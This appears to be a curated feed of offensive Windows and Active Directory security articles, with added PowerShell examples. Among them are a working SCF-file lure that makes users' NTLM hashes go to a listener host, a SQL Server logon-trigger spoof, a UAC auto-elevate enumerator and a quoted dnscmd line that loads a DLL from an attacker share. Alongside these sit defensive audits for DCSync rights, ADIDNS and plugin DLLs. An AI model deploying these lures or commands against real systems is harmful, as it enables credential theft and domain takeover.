PSScriptAnalyzer is a static code checker for Windows PowerShell modules and scripts. It checks code quality by running a set of rules based on best practices identified by the PowerShell Team and the community, and emits diagnostic records (errors, warnings, information) that flag potential defects and suggest fixes.
https://github.com/PowerShell/PSScriptAnalyzer
@WindowsHackingLibrary
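As an added example (not code from the PSScriptAnalyzer project), the following runs a security-focused subset of its rules against a constructed sample script and returns a pass/fail result suitable for a CI gate. The rule names are real PSScriptAnalyzer rules; the sample script, the function name and the exit-code handling are mine.

```powershell
# Added example: gate a script on PSScriptAnalyzer's security-relevant rules.
# Requires: Install-Module PSScriptAnalyzer -Scope CurrentUser
Import-Module PSScriptAnalyzer

# Constructed sample with the kinds of defects these rules catch:
# a plaintext password parameter, a plaintext SecureString conversion, and
# Invoke-Expression over untrusted input.
$sample = @'
param([string]$Password = "P@ssw0rd!")
$sec = ConvertTo-SecureString $Password -AsPlainText -Force
Invoke-Expression (Get-Content .\cmds.txt -Raw)
'@

# Rules worth failing a build on (all exist in PSScriptAnalyzer).
$securityRules = @(
    'PSAvoidUsingPlainTextForPassword',
    'PSAvoidUsingConvertToSecureStringWithPlainText',
    'PSAvoidUsingInvokeExpression',
    'PSAvoidUsingUsernameAndPasswordParams',
    'PSUsePSCredentialType'
)

function Test-ScriptSecurity {
    param([Parameter(Mandatory)][string]$ScriptText)
    # -ScriptDefinition analyzes a string; use -Path/-Recurse for a repository.
    $findings = Invoke-ScriptAnalyzer -ScriptDefinition $ScriptText -IncludeRule $securityRules
    foreach ($f in $findings) {
        '{0,-11} line {1,3}  {2}: {3}' -f $f.Severity, $f.Line, $f.RuleName, $f.Message
    }
    return ($findings.Count -eq 0)
}

if (-not (Test-ScriptSecurity -ScriptText $sample)) {
    Write-Warning 'Security rules fired; block the change.'
    exit 1
}
```

For a whole module, swap `-ScriptDefinition` for `-Path <dir> -Recurse`, and pin the rule set in a `PSScriptAnalyzerSettings.psd1` passed with `-Settings` so the gate does not drift as the module's default rules change.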
Bypassing SQL Server Logon Trigger Restrictions
https://blog.netspi.com/bypass-sql-logon-triggers/
@WindowsHackingLibrary
This post shows how to bypass SQL Server logon trigger restrictions by spoofing the hostname and application name that the trigger checks, using lesser-known connection string properties.
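The spoof the post describes, as an added example that is not the post's own code: the `Workstation ID` and `Application Name` keywords of the .NET SqlClient connection string set what `HOST_NAME()` and `APP_NAME()` return on the server, which is all a logon trigger keyed on those values ever sees. The server name, the spoofed workstation and application names are assumptions.

```powershell
# Added example: open two connections, one honest and one with spoofed
# Workstation ID / Application Name, and show what the server-side functions
# a logon trigger typically checks would report for each.
Add-Type -AssemblyName System.Data

function Get-SqlIdentityAsSeen {
    param(
        [string]$Server = 'sqlsrv01',     # assumed target instance
        [string]$WorkstationId,           # overrides HOST_NAME() when set
        [string]$AppName                  # overrides APP_NAME() when set
    )
    $cs = "Server=$Server;Integrated Security=SSPI;TrustServerCertificate=True;"
    if ($WorkstationId) { $cs += "Workstation ID=$WorkstationId;" }
    if ($AppName)       { $cs += "Application Name=$AppName;" }

    $conn = New-Object System.Data.SqlClient.SqlConnection $cs
    try {
        $conn.Open()   # the logon trigger fires here, before the query runs
        $cmd = $conn.CreateCommand()
        $cmd.CommandText = 'SELECT HOST_NAME() AS HostName, APP_NAME() AS AppName, SUSER_SNAME() AS Login'
        $rdr = $cmd.ExecuteReader()
        if ($rdr.Read()) {
            [pscustomobject]@{
                HostName = $rdr['HostName']
                AppName  = $rdr['AppName']
                Login    = $rdr['Login']
            }
        }
    } finally {
        $conn.Dispose()
    }
}

# Honest connection: HostName is this machine, AppName is ".Net SqlClient Data Provider".
Get-SqlIdentityAsSeen

# Spoofed connection: values chosen to match whatever allow-list the trigger uses (assumed).
Get-SqlIdentityAsSeen -WorkstationId 'ADMIN-WS01' -AppName 'Microsoft SQL Server Management Studio'
```

The defensive takeaway is that `HOST_NAME()` and `APP_NAME()` are client-asserted and cannot anchor an access decision. A logon trigger that must restrict origin should use the client address instead, via `EVENTDATA()`'s `ClientHost` element or `CONNECTIONPROPERTY('client_net_address')`, together with the login itself, and the real control belongs at the network and login level rather than in the trigger.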
Spoof SSDP replies to phish for credentials and NetNTLM challenge/response on a network. Creates a fake UPnP device, tricking users into visiting a malicious phishing page; also detects and exploits XXE…
https://gitlab.com/initstring/evil-ssdp
@WindowsHackingLibrary
Incapacitating Windows Defender
http://www.offensiveops.io/tools/incapacitating-windows-defender/
@WindowsHackingLibrary
Red Team Tales 0x01: From MSSQL to RCE
https://www.tarlogic.com/en/blog/red-team-tales-0x01
@WindowsHackingLibrary
In a Red Team operation, a perimeter asset vulnerable to SQL Injection was identified. Through this vulnerability it was possible to execute commands on the server, requiring an unusual tactic to achieve the exfiltration of the output of the…
LethalHTA - A new lateral movement technique using DCOM and HTA
https://codewhitesec.blogspot.com/2018/07/lethalhta.html
@WindowsHackingLibrary
The following blog post introduces a new lateral movement technique that combines the power of DCOM and HTA. The research on this t...
What is it that Makes a Microsoft Executable a Microsoft Executable? An Attacker’s and a Defender’s Perspective
https://posts.specterops.io/what-is-it-that-makes-a-microsoft-executable-a-microsoft-executable-b43ac612195e
@WindowsHackingLibrary
@BlueTeamLibrary
What exactly is it that separates arbitrary code from code that originates from Microsoft? I would wager that the reaction of most people…
PowerShell script to enumerate executables with auto-elevation enabled; handy for privilege escalation (UAC bypass hunting).
https://gist.github.com/Evilcry/71e03a969689b8fd1297a1803aa4d7cf
@WindowsHackingLibrary
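An added example of the same enumeration, written here rather than taken from the linked gist: the application manifest is embedded in the PE as UTF-8 XML, so a text search for `<autoElevate>true</autoElevate>` over the file body finds candidates without a resource parser. The function name and the extra columns (requested execution level, signature state) are mine; the search paths are the usual ones and can be changed.

```powershell
# Added example: list binaries whose embedded manifest requests auto-elevation.
function Get-AutoElevateExecutable {
    param(
        [string[]]$Path = @("$env:SystemRoot\System32", "$env:SystemRoot\SysWOW64"),
        [switch]$IncludeDlls
    )
    $extensions = if ($IncludeDlls) { '.exe', '.dll' } else { '.exe' }

    Get-ChildItem -Path $Path -File -ErrorAction SilentlyContinue |
        Where-Object { $_.Extension -in $extensions } |
        ForEach-Object {
            $file = $_.FullName
            # -Quiet returns $true on the first match and avoids building MatchInfo objects.
            if (Select-String -Path $file -Pattern '<autoElevate>\s*true\s*</autoElevate>' -Quiet) {
                $level = 'unknown'
                foreach ($candidate in 'requireAdministrator', 'highestAvailable', 'asInvoker') {
                    if (Select-String -Path $file -Pattern ('level="{0}"' -f $candidate) -Quiet) {
                        $level = $candidate
                        break
                    }
                }
                # Auto-elevation is only honoured for Microsoft-signed binaries in trusted
                # locations, so record the signature state alongside the manifest flag.
                $sig = Get-AuthenticodeSignature -FilePath $file
                [pscustomobject]@{
                    Path           = $file
                    ExecutionLevel = $level
                    SignatureValid = ($sig.Status -eq 'Valid')
                    Signer         = if ($sig.SignerCertificate) { $sig.SignerCertificate.Subject } else { $null }
                }
            }
        }
}

Get-AutoElevateExecutable | Sort-Object Path | Format-Table -AutoSize
```

A hit means only that the manifest asks for auto-elevation; the binary still has to be signed by Microsoft and live in a trusted directory for UAC to grant it silently, and turning a hit into a bypass requires the elevated process to load something you control (a COM object, a DLL, a registry-driven path), which is what the blog posts in this feed about UAC bypasses go on to look for.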
Using a SCF File to gather Hashes
https://1337red.wordpress.com/using-a-scf-file-to-gather-hashes/
@WindowsHackingLibrary
Have you ever been on an internal network assessment and discovered an unauthenticated writable Windows-based file share? Well, in addition to finding potentially sensitive information, you can abus…
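The lure the post is about, as an added example that is not the post's own code: an SCF file whose `IconFile` points at a UNC path on a host you control. Explorer resolves the icon as soon as a user browses the folder, which triggers an SMB connection and NTLM authentication to that host, where a listener such as Responder captures the NetNTLM challenge/response. The share path and listener address are assumptions; the second function is the defender-side sweep.

```powershell
# Added example: plant an SCF lure on a writable share, and sweep a share for SCF
# files whose icon path points off-host.

function New-ScfLure {
    param(
        [Parameter(Mandatory)][string]$SharePath,     # writable share, e.g. \\fileserver\public (assumed)
        [Parameter(Mandatory)][string]$ListenerHost,  # host running the NTLM capture listener (assumed)
        [string]$FileName = '@readme.scf'             # leading '@' sorts the file to the top of the listing
    )
    # Standard SCF layout; only IconFile matters for the authentication trigger.
    $content = @"
[Shell]
Command=2
IconFile=\\$ListenerHost\share\icon.ico
[Taskbar]
Command=ToggleDesktop
"@
    $target = Join-Path -Path $SharePath -ChildPath $FileName
    # Write plain ASCII without a BOM so Explorer parses the INI-style content.
    [System.IO.File]::WriteAllText($target, $content, [System.Text.Encoding]::ASCII)
    Get-Item -Path $target
}

function Find-ScfOnShare {
    param([Parameter(Mandatory)][string]$SharePath)
    Get-ChildItem -Path $SharePath -Filter *.scf -Recurse -File -ErrorAction SilentlyContinue |
        ForEach-Object {
            $match = Select-String -Path $_.FullName -Pattern '^IconFile=(.+)$' | Select-Object -First 1
            $icon  = if ($match) { $match.Matches[0].Groups[1].Value.Trim() } else { $null }
            [pscustomobject]@{
                Path     = $_.FullName
                IconFile = $icon
                Remote   = ($icon -like '\\*')   # a UNC icon path is the tell
            }
        }
}

New-ScfLure -SharePath '\\fileserver\public' -ListenerHost '10.0.0.5'
Find-ScfOnShare -SharePath '\\fileserver\public' | Where-Object Remote
```

The captured NetNTLMv2 response is only useful if it can be cracked or relayed, so the listener's value depends on SMB signing and the password quality of whoever browses the share. On the defensive side the fix is the same as for every UNC-icon trick: no unauthenticated writable shares, outbound SMB blocked at the perimeter, and SMB signing required so relay is off the table. Whether Explorer still follows a remote SCF icon path also depends on the Windows build and patch level, so verify on a representative client before relying on it in either direction.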
A Guide to Attacking Domain Trusts
http://www.harmj0y.net/blog/redteaming/a-guide-to-attacking-domain-trusts/
@WindowsHackingLibrary
RE: Evading Autoruns PoCs on Windows 10
https://medium.com/@KyleHanslovan/re-evading-autoruns-pocs-on-windows-10-dd810d7e8a3f
@WindowsHackingLibrary
Last September, Chris Bisnett and I presented research at DerbyCon which highlighted a handful of techniques and bugs we discovered that…
Feature, not bug: DNSAdmin to DC compromise in one line
https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83
@WindowsHackingLibrary
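The "one line" in the title is `dnscmd` setting the DNS server's `ServerLevelPluginDll`: a member of DnsAdmins can point it at any DLL path, and the DNS service, which runs as SYSTEM on the domain controller, loads that DLL the next time it starts. As an added example that is not the post's code, the block below shows the offending command for reference and then the audit a defender runs to find the value on every DC and to review who can set it. The DLL path, DC name and use of WinRM (`Invoke-Command`) for the remote read are assumptions.

```powershell
# Added example: audit ServerLevelPluginDll across domain controllers and
# list who holds the DnsAdmins membership that makes setting it possible.
#
# The one-liner the post is about (DnsAdmins membership, target DC name assumed):
#   dnscmd dc01 /config /serverlevelplugindll \\attacker\share\evil.dll
# The value lands in the registry key checked below and is honoured on service restart.

Import-Module ActiveDirectory

function Get-DnsServerPluginDll {
    param([string[]]$ComputerName = $env:COMPUTERNAME)
    foreach ($dc in $ComputerName) {
        $value = Invoke-Command -ComputerName $dc -ErrorAction SilentlyContinue -ScriptBlock {
            Get-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Services\DNS\Parameters' `
                             -Name ServerLevelPluginDll -ErrorAction SilentlyContinue |
                Select-Object -ExpandProperty ServerLevelPluginDll
        }
        [pscustomobject]@{
            DC                   = $dc
            ServerLevelPluginDll = $value
            Suspicious           = [bool]$value   # the value is unset on a healthy DC
        }
    }
}

# Every DNS-serving DC in the domain.
$dcs = (Get-ADDomainController -Filter *).HostName
Get-DnsServerPluginDll -ComputerName $dcs | Format-Table -AutoSize

# The group whose members can set the value; keep it empty or tightly controlled.
Get-ADGroupMember -Identity DnsAdmins -Recursive | Select-Object Name, objectClass
```

Because the DLL is only loaded on service start, the attacker also needs to restart the DNS service (or wait for a reboot), so alerting on changes to that registry value (Sysmon event 13 on the key above) and on unexpected DNS service restarts catches the technique before it pays off.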
Beyond LLMNR/NBNS Spoofing – Exploiting Active Directory-Integrated DNS
https://blog.netspi.com/exploiting-adidns
@WindowsHackingLibrary
Exploiting weaknesses in name resolution protocols is a common technique for performing man-in-the-middle (MITM) attacks. This blog dives into two particularly vulnerable name resolution protocols: Link-Local Multicast Name Resolution (LLMNR) and NetBIOS…
Related: Powermad (Kevin-Robertson/Powermad), PowerShell MachineAccountQuota and DNS exploit tools (README).
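An added defender-side check for the ADIDNS weakness the post and Powermad exploit, written here rather than taken from either: by default any authenticated user can create `dnsNode` objects in an AD-integrated zone, and a wildcard (`*`) record there answers every name that does not otherwise resolve, which turns name-resolution spoofing into a persistent, network-wide position. The function reads the zone ACL and looks for existing wildcard nodes. Zone name is taken from the current domain; zones stored in the ForestDnsZones partition need the DN adjusted, and the LDAP escape of the literal asterisk (`\2a`) is the detail that makes the search work.

```powershell
# Added example: audit an AD-integrated zone for wildcard nodes and for the
# default "Authenticated Users may create child objects" ACE.
Import-Module ActiveDirectory

function Get-AdidnsRisk {
    param([string]$Zone = (Get-ADDomain).DNSRoot)

    $domainDn = (Get-ADDomain).DistinguishedName
    # Domain-partition zones live under DomainDnsZones; forest-wide ones under ForestDnsZones.
    $zoneDn = "DC=$Zone,CN=MicrosoftDNS,DC=DomainDnsZones,$domainDn"

    # A literal '*' must be escaped as \2a, otherwise the filter matches every node.
    $wildcards = Get-ADObject -SearchBase $zoneDn `
                              -LDAPFilter '(&(objectClass=dnsNode)(name=\2a))' `
                              -Properties whenCreated, dnsTombstoned

    $R   = [System.DirectoryServices.ActiveDirectoryRights]
    $acl = Get-Acl -Path "AD:\$zoneDn"
    $authUsersCreate = $acl.Access | Where-Object {
        $_.IdentityReference.Value -eq 'NT AUTHORITY\Authenticated Users' -and
        $_.AccessControlType -eq 'Allow' -and
        ($_.ActiveDirectoryRights -band $R::CreateChild)
    }

    [pscustomobject]@{
        Zone                             = $Zone
        WildcardNodes                    = @($wildcards | ForEach-Object {
                                               '{0} created {1} tombstoned={2}' -f $_.Name, $_.whenCreated, [bool]$_.dnsTombstoned
                                           })
        AuthenticatedUsersCanCreateChild = [bool]$authUsersCreate
    }
}

Get-AdidnsRisk | Format-List
```

A wildcard node you did not create is a finding in itself. Since a node that already exists cannot be re-created by an attacker, registering your own wildcard record (pointed somewhere harmless) closes the specific wildcard trick, and removing the create-child ACE for Authenticated Users, or raising the bar with secure dynamic updates restricted to machine accounts, removes the general ability to add records.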
Domain Access With Write Access on the Domain NC Head
https://sdmsoftware.com/group-policy-blog/security-policy/elevating-ad-domain-access-with-write-access-on-the-domain-nc-head
@WindowsHackingLibrary
With this post and my last post, I guess I'm on a path of finding interesting ways to "break" AD. The last post related to AD denial of service and this Write access to the Domain object could allow domain admin access.
Extracting User Password Data with Mimikatz DCSync
https://blog.stealthbits.com/extracting-user-password-data-with-mimikatz-dcsync/
@WindowsHackingLibrary
Using the Mimikatz DCSync command to compromise credentials by requesting directory replication from a domain controller over the Directory Replication Service Remote Protocol (MS-DRSR), which returns password hashes without ever touching LSASS or NTDS.dit.
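Both this entry and the SDM Software post above come down to the same ACL: DCSync works for any principal holding the replication extended rights on the domain NC head, and write access to that same object (GenericAll, WriteDacl or WriteOwner) lets a principal grant itself those rights. As an added example that is not from either post, the audit below walks the domain head's DACL and reports every allow ACE for a non-default principal that confers one of those rights. The extended-right GUIDs are the documented ones; the list of expected principals and the function name are mine.

```powershell
# Added example: find principals that can DCSync, or can give themselves the
# ability to, by inspecting the domain NC head's DACL.
Import-Module ActiveDirectory

$ReplicationRights = @{
    '1131f6aa-9c07-11d1-f79f-00c04fc2dcd2' = 'DS-Replication-Get-Changes'
    '1131f6ad-9c07-11d1-f79f-00c04fc2dcd2' = 'DS-Replication-Get-Changes-All'
    '89e95b76-444d-4c62-991a-0facbeda640c' = 'DS-Replication-Get-Changes-In-Filtered-Set'
}
$AllExtendedRights = '00000000-0000-0000-0000-000000000000'   # ObjectType of an unscoped ExtendedRight ACE

# Principals expected to hold these rights; anything else is a finding (assumed baseline).
$Expected = 'BUILTIN\Administrators', 'NT AUTHORITY\SYSTEM', 'NT AUTHORITY\ENTERPRISE DOMAIN CONTROLLERS',
            '*\Domain Controllers', '*\Enterprise Admins', '*\Domain Admins'

function Get-DomainHeadRiskyAce {
    $R   = [System.DirectoryServices.ActiveDirectoryRights]
    $dn  = (Get-ADDomain).DistinguishedName
    $acl = Get-Acl -Path "AD:\$dn"

    foreach ($ace in ($acl.Access | Where-Object AccessControlType -eq 'Allow')) {
        $who = $ace.IdentityReference.Value
        if ($Expected | Where-Object { $who -like $_ }) { continue }

        $rights = $ace.ActiveDirectoryRights
        $guid   = $ace.ObjectType.ToString()
        $reason = $null

        if (($rights -band $R::ExtendedRight) -and $ReplicationRights.ContainsKey($guid)) {
            $reason = $ReplicationRights[$guid]                      # direct DCSync capability
        } elseif (($rights -band $R::ExtendedRight) -and $guid -eq $AllExtendedRights) {
            $reason = 'All extended rights (includes replication)'
        } elseif ($rights -band $R::GenericAll) {
            $reason = 'GenericAll (can grant replication rights)'
        } elseif ($rights -band $R::WriteDacl) {
            $reason = 'WriteDacl (can grant replication rights)'
        } elseif ($rights -band $R::WriteOwner) {
            $reason = 'WriteOwner (can take ownership, then WriteDacl)'
        }

        if ($reason) {
            [pscustomobject]@{
                Principal = $who
                Reason    = $reason
                Rights    = $rights
                Inherited = $ace.IsInherited
            }
        }
    }
}

Get-DomainHeadRiskyAce | Format-Table -AutoSize
```

Service accounts for backup, sync or "AD health" products frequently end up in this output with Get-Changes-All; each one is a DCSync path and should be either justified or removed. On the detection side, DCSync shows up as directory replication (event 4662 with the replication GUIDs above) from a source that is not a domain controller, which is the complementary check to this ACL audit.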
Passing-the-Hash to NTLM Authenticated Web Applications
https://labs.mwrinfosecurity.com/blog/pth-attacks-against-ntlm-authenticated-web-applications/
@WindowsHackingLibrary
Application Whitelisting Bypass and Arbitrary Unsigned Code Execution Technique in winrm.vbs
https://posts.specterops.io/application-whitelisting-bypass-and-arbitrary-unsigned-code-execution-technique-in-winrm-vbs-c8c24fb40404
@WindowsHackingLibrary
Veil Payloads and Veil-Ordnance
https://www.fortynorthsecurity.com/veil-payloads-and-veil-ordnance/
@WindowsHackingLibrary
Explaining Veil Payloads and Invoking Veil-Ordnance
In order to effectively use cyber security tools we need to know, in detail, how they work. Only then we are able to leverage them to the best of their capabilities. In this post we will dive into Veil-Evasion and learn its payload naming scheme, different…